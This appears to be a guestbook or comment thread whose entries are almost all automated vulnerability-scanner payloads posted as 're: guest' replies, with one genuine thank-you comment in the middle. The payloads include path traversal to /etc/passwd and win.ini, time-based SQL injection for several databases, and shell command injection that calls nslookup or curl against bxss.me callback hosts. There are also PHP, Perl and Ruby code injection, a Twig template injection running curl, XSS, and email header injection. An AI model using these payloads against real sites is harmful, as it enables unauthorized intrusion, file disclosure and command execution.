/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")|(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")&(nslookup hitztywsctpqea2f37.bxss.me||perl -e "gethostbyname('hitztywsctpqea2f37.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
'.gethostbyname(lc('hitfl'.'qitkllaye3a35.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(89).chr(99).chr(77).'
re: guest
Http://bxss.me/t/fit.txt
re: guest
/../../../../../../../../../../boot.ini
re: guest
".gethostbyname(lc("hitsw"."uixpdomud574c.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(66).chr(97).chr(84)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
/etc/shells
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
c:/windows/win.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
bxss.me
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(117).concat(83).concat(98).concat(80)+(require"socket"
Socket.gethostbyname("hitqw"+"xngzhpyy244f8.bxss.me.")[3].to_s)+"
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(110).concat(74).concat(115).concat(71)+(require'socket'
Socket.gethostbyname('hitkv'+'egcgombn2e58f.bxss.me.')[3].to_s)+'
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
';print(md5(31337));$a='
re: guest
";print(md5(31337));$a="
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
'.print(md5(31337)).'
re: guest
1
re: guest
1
re: guest
-1 OR 2+293-293-1=0+0+0+1 --
re: guest
-1 OR 3+293-293-1=0+0+0+1 --
re: guest
-1 OR 2+256-256-1=0+0+0+1
re: guest
-1 OR 3+256-256-1=0+0+0+1
re: guest
-1' OR 2+850-850-1=0+0+0+1 --
re: guest
-1' OR 3+850-850-1=0+0+0+1 --
re: guest
-1' OR 2+334-334-1=0+0+0+1 or 'toJP8EzL'='
re: guest
-1' OR 3+334-334-1=0+0+0+1 or 'toJP8EzL'='
re: guest
-1" OR 2+480-480-1=0+0+0+1 --
re: guest
-1" OR 3+480-480-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Ee7i5HLy'; waitfor delay '0:0:15' --
re: guest
-5 OR 22=(SELECT 22 FROM PG_SLEEP(15))--
re: guest
-5) OR 115=(SELECT 115 FROM PG_SLEEP(15))--
re: guest
-1)) OR 447=(SELECT 447 FROM PG_SLEEP(15))--
re: guest
EB5dhYrs' OR 936=(SELECT 936 FROM PG_SLEEP(15))--
re: guest
Wznc8YmJ') OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: guest
aW8TM3ZA')) OR 556=(SELECT 556 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
1BBE8YLZB40
re: guest
response.write(9549472*9471912)
re: guest
'+response.write(9549472*9471912)+'
re: guest
"+response.write(9549472*9471912)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${9999614+9999841}
re: guest
../
re: guest
)
re: guest
redirtest.acx
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
echo yrdmye$()\ yfhrxq\nz^xyu||a #' &echo yrdmye$()\ yfhrxq\nz^xyu||a #|" &echo yrdmye$()\ yfhrxq\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
'.gethostbyname(lc('hityi'.'ecplnglj1923a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(65).chr(114).chr(73).'
re: guest
&echo yazgvo$()\ iuyjbp\nz^xyu||a #' &echo yazgvo$()\ iuyjbp\nz^xyu||a #|" &echo yazgvo$()\ iuyjbp\nz^xyu||a #
re: guest
/etc/shells
re: guest
".gethostbyname(lc("hitus"."fjcqfgpk29488.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(81).chr(108).chr(90)."
re: guest
|echo zkawbs$()\ xuaaxe\nz^xyu||a #' |echo zkawbs$()\ xuaaxe\nz^xyu||a #|" |echo zkawbs$()\ xuaaxe\nz^xyu||a #
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
gethostbyname(lc('hitgk'.'ymnawxaic7d92.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(74).chr(121).chr(65)
re: guest
expr 9000270409 - 933463
re: guest
c:/windows/win.ini
re: guest
(nslookup -q=cname hittnhuufkupsd8ed6.bxss.me||curl hittnhuufkupsd8ed6.bxss.me))
re: guest
bxss.me
re: guest
$(nslookup -q=cname hitbjpfmbzkou687f8.bxss.me||curl hitbjpfmbzkou687f8.bxss.me)
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup -q=cname hitstlnhrsnuk6a624.bxss.me&'\"`0&nslookup -q=cname hitstlnhrsnuk6a624.bxss.me&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&(nslookup -q=cname hitengtcjbqkc4dc36.bxss.me||curl hitengtcjbqkc4dc36.bxss.me)&'\"`0&(nslookup -q=cname hitengtcjbqkc4dc36.bxss.me||curl hitengtcjbqkc4dc36.bxss.me)&`'
re: guest
|(nslookup -q=cname hitbzvejqqzlk2d4a2.bxss.me||curl hitbzvejqqzlk2d4a2.bxss.me)
re: guest
`(nslookup -q=cname hitvjckininxq43aba.bxss.me||curl hitvjckininxq43aba.bxss.me)`
re: guest
'"()
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
;(nslookup -q=cname hitycabqupmehba162.bxss.me||curl hitycabqupmehba162.bxss.me)|(nslookup -q=cname hitycabqupmehba162.bxss.me||curl hitycabqupmehba162.bxss.me)&(nslookup -q=cname hitycabqupmehba162.bxss.me||curl hitycabqupmehba162.bxss.me)
re: guest
'&&sleep(27*1000)*njjtsu&&'
re: guest
';print(md5(31337));$a='
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitxmzdyjqlyn34dc2.bxss.me||curl${IFS}hitxmzdyjqlyn34dc2.bxss.me)
re: guest
"&&sleep(27*1000)*iqceop&&"
re: guest
";print(md5(31337));$a="
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitsalvtyacbz92d50.bxss.me||curl${IFS}hitsalvtyacbz92d50.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitsalvtyacbz92d50.bxss.me||curl${IFS}hitsalvtyacbz92d50.bxss.me)&`'
re: guest
'||sleep(27*1000)*duuxbh||'
re: guest
${@print(md5(31337))}
re: guest
"||sleep(27*1000)*vwnnpi||"
re: guest
${@print(md5(31337))}\
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
'.print(md5(31337)).'
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(112).concat(86).concat(98).concat(81)+(require"socket"
Socket.gethostbyname("hitsb"+"xzlrlgvw14e5d.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(122).concat(87).concat(120).concat(87)+(require'socket'
Socket.gethostbyname('hitul'+'vdnmbdjs8a227.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(110).concat(67).concat(109).concat(83)+(require'socket'
Socket.gethostbyname('hitsg'+'fpczskra90964.bxss.me.')[3].to_s)
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >5l42(9337)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxkunhejaai27791.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >5l42(9542)</ScRiPt>
re: guest
9040116
re: guest
bwgw1dOz
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
4vfrUHtt'; waitfor delay '0:0:15' --
re: guest
-1 OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: guest
-1) OR 960=(SELECT 960 FROM PG_SLEEP(15))--
re: guest
-1)) OR 738=(SELECT 738 FROM PG_SLEEP(15))--
re: guest
ad5BrTZK' OR 479=(SELECT 479 FROM PG_SLEEP(15))--
re: guest
f1sHNuFT') OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: guest
eO6MoJEw')) OR 695=(SELECT 695 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@wsx62
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Didn't notice this until now, I like the changes! This is the the right direction, thank you Saito san!
re: guest
FuTN5R4t
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+759-759-1=0+0+0+1
re: guest
-1 OR 3+759-759-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
658rVC28'; waitfor delay '0:0:15' --
re: guest
-5 OR 843=(SELECT 843 FROM PG_SLEEP(15))--
re: guest
-5) OR 499=(SELECT 499 FROM PG_SLEEP(15))--
re: guest
-1)) OR 19=(SELECT 19 FROM PG_SLEEP(15))--
re: guest
06WLhOHu' OR 674=(SELECT 674 FROM PG_SLEEP(15))--
re: guest
dDy1ZzQA') OR 191=(SELECT 191 FROM PG_SLEEP(15))--
re: guest
jhix0AHz')) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@i46o2
re: guest
1DblNdStzIO
re: guest
response.write(9943419*9938017)
re: guest
'+response.write(9943419*9938017)+'
re: guest
"+response.write(9943419*9938017)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo vpvbnf$()\ zsbgzd\nz^xyu||a #' &echo vpvbnf$()\ zsbgzd\nz^xyu||a #|" &echo vpvbnf$()\ zsbgzd\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo ovqdqx$()\ auhgsk\nz^xyu||a #' &echo ovqdqx$()\ auhgsk\nz^xyu||a #|" &echo ovqdqx$()\ auhgsk\nz^xyu||a #
re: guest
|echo oljwwp$()\ jsoqwb\nz^xyu||a #' |echo oljwwp$()\ jsoqwb\nz^xyu||a #|" |echo oljwwp$()\ jsoqwb\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
(nslookup hitpduqkclgjgd548a.bxss.me||perl -e "gethostbyname('hitpduqkclgjgd548a.bxss.me')")
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
$(nslookup hitrgkoahndhgd88ab.bxss.me||perl -e "gethostbyname('hitrgkoahndhgd88ab.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
&nslookup hitcxduqwntqyfcae9.bxss.me&'\"`0&nslookup hitcxduqwntqyfcae9.bxss.me&`'
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
&(nslookup hitvieckugakr690c7.bxss.me||perl -e "gethostbyname('hitvieckugakr690c7.bxss.me')")&'\"`0&(nslookup hitvieckugakr690c7.bxss.me||perl -e "gethostbyname('hitvieckugakr690c7.bxss.me')")&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
|(nslookup hitffcxyqvlqnea656.bxss.me||perl -e "gethostbyname('hitffcxyqvlqnea656.bxss.me')")
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
`(nslookup hitvgccarpygzd831b.bxss.me||perl -e "gethostbyname('hitvgccarpygzd831b.bxss.me')")`
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
;(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")|(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")&(nslookup hitnctquisawt4c19c.bxss.me||perl -e "gethostbyname('hitnctquisawt4c19c.bxss.me')")
re: guest
file:///etc/passwd
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
%0abcc:074625.67-22273.67.c53de.19990.2@bxss.me
re: guest
/../../../../../../../../../../boot.ini
re: guest
to@example.com>%0d%0abcc:074625.67-22274.67.c53de.19990.2@bxss.me
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.